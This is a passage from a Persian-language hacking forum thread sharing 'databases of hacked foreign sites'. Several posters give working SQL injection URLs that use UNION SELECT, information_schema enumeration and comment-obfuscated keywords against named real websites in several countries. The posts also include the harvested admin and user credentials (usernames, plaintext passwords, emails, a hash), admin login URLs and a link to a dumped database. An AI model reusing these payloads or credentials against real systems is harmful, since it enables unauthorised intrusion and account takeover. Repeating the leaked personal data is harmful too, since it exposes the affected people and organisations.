پرش به


تصویر

دیتابیس سایت های مورد نفوذ قرار گرفته (خارجی)

اختصاصی

 • لطفا وارد حساب کاربری خود شوید تا بتوانید پاسخ دهید
217 پاسخ برای این موضوع

#131 ارسالی 06 اوت 2016 - 03:51

darkness
+849
  OFFLINE
  تاریخ عضویت :
  30 سپتامبر 2015
 • DarknesS HackeR
 • VIP
 • 329 ارسال
  Last Visit ژوئن 05 2018 04:33
 • Slogan : DARKNESS HACKER
 • Country :
 • Gender : Not Telling
 • Location : IRAN
 • Name : DARKNESS HACKER

http://www.licytus.pl/ دیتابیس این سایت

 

http://s1.picofile.c..._16_sql.gz.html


DARKNESS HACKER

 

id Telegram channel:@baxanonymous
 

01_2.png


#132 ارسالی 10 اوت 2016 - 11:14

  OFFLINE
  تاریخ عضویت :
  15 ژوئیه 2016
 • %100██████████
 • VIP
 • 127 ارسال
  Last Visit اكتبر 08 2017 09:55
 • Country :
 • Gender : Male
 • Location : Munykh
 • Name : Black
http://panoramait.com.sa
http://panoramait.com.sa/detailnews.php?id=-8%20/*!50000union*/%20select%201,0x496e6a656354656420427920426c34636b205734726e696e67,3,/*!50000grOup_concAt%28USERID,0x3a,PASSWORD,0x3a,NAME%29*/,5,6,7+from+ADMIN--
panorama:panorama
http://panoramait.com.sa/admins

تصویر

I'm Bl4ck W4rning

I'm Iranian

I'm Anonymous

--------------------------------

ANONYMOUS IS LEGION


WE DO NOT FORGET - WE DO NOT FORGIVE


EXPECT US


#133 ارسالی 10 اوت 2016 - 03:42

Danger BoY
+2,705
  OFFLINE
  تاریخ عضویت :
  31 دسامبر 2015
 • Attacker
 • VIP
 • 536 ارسال
  Last Visit 21 ساعت قبل
 • Slogan : My enemies have to sit for my Progress movie review
 • Country :
 • Gender : Male
 • Location : Your Server
 • Name : Unknown
http://www.crom.co.uk/news.php?id=1+order+by+9--

http://www.crom.co.uk/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9--

http://www.crom.co.uk/news.php?id=-1+union+select+1,2,database%28%29,4,5,6,7,8,9--

http://www.crom.co.uk/news.php?id=-1+union+select+1,2,version%28%29,4,5,6,7,8,9--

http://www.crom.co.uk/news.php?id=-1+union+select+1,2,group_concat%28table_name%29,4,5,6,7,8,9+from+information_schema.tables--

==============================================================================================================================================


http://www.crom.co.uk/news.php?id=-1+union+select+1,2,group_concat%28column_name%29,4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x61646D696E--

http://www.crom.co.uk/news.php?id=-1+union+select+1,2,group_concat%28password,0x3a,email%29,4,5,6,7,8,9+from+admin--

image.gif
Iranonymous Security Team


++++++++++++++++++++++++++++++++
icon3.png


#134 ارسالی 11 اوت 2016 - 06:46

  OFFLINE
  تاریخ عضویت :
  15 ژوئیه 2016
 • %100██████████
 • VIP
 • 127 ارسال
  Last Visit اكتبر 08 2017 09:55
 • Country :
 • Gender : Male
 • Location : Munykh
 • Name : Black
http://www.everyway-medical.com
http://www.everyway-medical.com/products.php?id=-2+/*!50000union*/%20select+1,2,3,4,5,6,7,8,9,10,11,0x496e6a656354656420427920426c34636b205734726e696e67,13,14,15,/*!50000GroUp_ConCaT%28usermane,0x3a,password%29*/,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+admin--+
ANDY:1129,Michael Saad:ms0429,FIZYOLAB:FIZYOLAB0423,curatec:curatec0423,Nowak:Nowak0122,tritechint:tritechint0121,Savantini:Savantini1026,Luis Rojas:Luis Rojas1004,Metro:Metro1001,KINGS:3559118,Astar:Astar1213,VanLent:VanLent0914,everyway:everyway0424,DOCTOR:DOCTOR0417,Sorisa:Sorisa0224,physio2go:physio2go0711,Zahid:Zahid0922,Shah:Shah0817,REHAB MEDIC:REHAB MEDIC0804,heller:heller0914,AXION:AXION0201,ADVANTAGE:ADVANTAGE0222,Hitech:Hitech0727,MEDI-STIM:MEDI-STIM0627,astir:astir0818,GIMA:GIMA1005,ANSIRAMED:ANSIRAMED0112,barmatuhi:barmatuhi0924,dora:dora,VERN:VERN0713
http://www.everyway-medical.com/login.php

تصویر

I'm Bl4ck W4rning

I'm Iranian

I'm Anonymous

--------------------------------

ANONYMOUS IS LEGION


WE DO NOT FORGET - WE DO NOT FORGIVE


EXPECT US


#135 ارسالی 12 اوت 2016 - 07:13

  OFFLINE
  تاریخ عضویت :
  15 ژوئیه 2016
 • %100██████████
 • VIP
 • 127 ارسال
  Last Visit اكتبر 08 2017 09:55
 • Country :
 • Gender : Male
 • Location : Munykh
 • Name : Black
http://myanmarcareerconyat.com.mm
1-http://myanmarcareerconyat.com.mm/company_detail.php?id=-1%20union%20select%201,2,3,4,0x496e6a656354656420427920426c34636b205734726e696e67202d204972616e6f6e796d6f75732e6f7267,6,7,group_concat%28email,0x3a,password%29,9,10,11+from%20admin--


tatwin@myanmarcareerconyat.com.mm:abc123,admin@admin.com:@dmin

2-


http://myanmarcareerconyat.com.mm/company_detail.php?id=-1%20union%20select%201,2,3,4,0x496e6a656354656420427920426c34636b205734726e696e67202d204972616e6f6e796d6f75732e6f7267,6,7,group_concat%28email,0x3a,pazzword%29,9,10,11+from%20account--#


kolatt81@gmail.com:123,tatwino@gmail.com:abc,htainlynnmyint@gmail.com:abc123,htainlynnmyint1@gmail.com:abc123,tatwino1@gmail.com:abc,kolatt811@gmail.com:123,myapyiesone@gmail.com:Emerald88


تصویر

I'm Bl4ck W4rning

I'm Iranian

I'm Anonymous

--------------------------------

ANONYMOUS IS LEGION


WE DO NOT FORGET - WE DO NOT FORGIVE


EXPECT US


#136 ارسالی 13 اوت 2016 - 09:59

Danger BoY
+2,705
  OFFLINE
  تاریخ عضویت :
  31 دسامبر 2015
 • Attacker
 • VIP
 • 536 ارسال
  Last Visit 21 ساعت قبل
 • Slogan : My enemies have to sit for my Progress movie review
 • Country :
 • Gender : Male
 • Location : Your Server
 • Name : Unknown
http://www.promoballvbf.it/news.php?id=1620+order+by+17--

http://www.promoballvbf.it/news.php?id=-1620+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

http://www.promoballvbf.it/news.php?id=-1620+union+select+1,2,3,4,5,6,7,8,9,version%28%29,11,12,13,14,15,16,17--

http://www.promoballvbf.it/news.php?id=-1620+union+select+1,2,3,4,5,6,7,8,9,group_concat%28table_name%29,11,12,13,14,15,16,17+from+information_schema.tables--

==================================================================


http://www.promoballvbf.it/news.php?id=-1620+union+select+1,2,3,4,5,6,7,8,9,group_concat%28column_name%29,11,12,13,14,15,16,17+from+information_schema.columns+where+table_name=0x636F6D5F7573657273--

http://www.promoballvbf.it/news.php?id=-1620+union+select+1,2,3,4,5,6,7,8,9,group_concat%28user,0x3a,password%29,11,12,13,14,15,16,17+from+com_users--

image.gif
Iranonymous Security Team


++++++++++++++++++++++++++++++++
icon3.png


#137 ارسالی 15 اوت 2016 - 07:42

  OFFLINE
  تاریخ عضویت :
  15 ژوئیه 2016
 • %100██████████
 • VIP
 • 127 ارسال
  Last Visit اكتبر 08 2017 09:55
 • Country :
 • Gender : Male
 • Location : Munykh
 • Name : Black

عربستان

 

http://www.jdco.com.sa
http://www.jdco.com.sa/news-details.php?id=-6%20union%20select%201,2,group_concat%28UserName,0x3a,Password%29,4+from+admin--

admin:1a76546ef88678a6a63cd3098f6e8ad7c9a9fc478e8fa76b55ee59fc75bdcc89

تصویر

I'm Bl4ck W4rning

I'm Iranian

I'm Anonymous

--------------------------------

ANONYMOUS IS LEGION


WE DO NOT FORGET - WE DO NOT FORGIVE


EXPECT US


#138 ارسالی 17 اوت 2016 - 11:26

  OFFLINE
  تاریخ عضویت :
  15 ژوئیه 2016
 • %100██████████
 • VIP
 • 127 ارسال
  Last Visit اكتبر 08 2017 09:55
 • Country :
 • Gender : Male
 • Location : Munykh
 • Name : Black
http://www.kingsauto.ca
http://www.kingsauto.ca/carinfo.php?id=637%27+union%20select+1,0x496e6a656374656420427920426c34636b205734726e696e67,3,4,grOUp_coNCat%28userName,0x3a,password%29,6,7,8,9+from+login--+
dannyadmin:#%northfieldDR

تصویر

I'm Bl4ck W4rning

I'm Iranian

I'm Anonymous

--------------------------------

ANONYMOUS IS LEGION


WE DO NOT FORGET - WE DO NOT FORGIVE


EXPECT US


#139 ارسالی 18 اوت 2016 - 11:38

Ormazd
+1,723
  OFFLINE
  تاریخ عضویت :
  24 دسامبر 2015
 • ORMAZD
 • Super Moderator
 • 294 ارسال
  Last Visit آوریل 20 2018 01:18
 • Country :
 • Gender : Male

تارگت :

http://www.esnad.com.sa

لینک اینجکت :

http://www.esnad.com.sa/product_list.php?type_id=-18%27/*!50000union*//*!50000select*/1,2,/*!50000grOup_conCat(login_id,0x3a,login_name,0x3a,login_user,0x3a,login_pass)*/,4,5,6,7,8,9,10,11/*!50000from*/login--+

یوزر :

admin:pass

به خیالشون که این تاج سرشونه تا همیشه
یادشون رفته که اون شاه که به صد مهره نمی باخت
تاج رو از سرش تو میدون لشکر پیاده انداخت
اونکه مارو بازی میده
اونیکه مهره رو چیده
اونیکه نه شاه نه سرباز
نه سیاه...........نه سفیده
از پس پرده نگاه کن


#140 ارسالی 22 اوت 2016 - 12:37

  OFFLINE
  تاریخ عضویت :
  15 ژوئیه 2016
 • %100██████████
 • VIP
 • 127 ارسال
  Last Visit اكتبر 08 2017 09:55
 • Country :
 • Gender : Male
 • Location : Munykh
 • Name : Black
http://www.citycement.sa
http://www.citycement.sa/eng/product.php?id=-1%20union%20select%201,2,0x496e6a656354656420427920426c34636b205734726e696e67,4,group_concat%28username,0x3a,password%29,6,7+from+admin--
admin:ccadmin@123

تصویر

I'm Bl4ck W4rning

I'm Iranian

I'm Anonymous

--------------------------------

ANONYMOUS IS LEGION


WE DO NOT FORGET - WE DO NOT FORGIVE


EXPECT US


1 کاربر در حال خواندن این موضوع است

0 کاربر، 1 مهمان و 0 عضو مخفی

رفتن به اول صفحه | Back To UP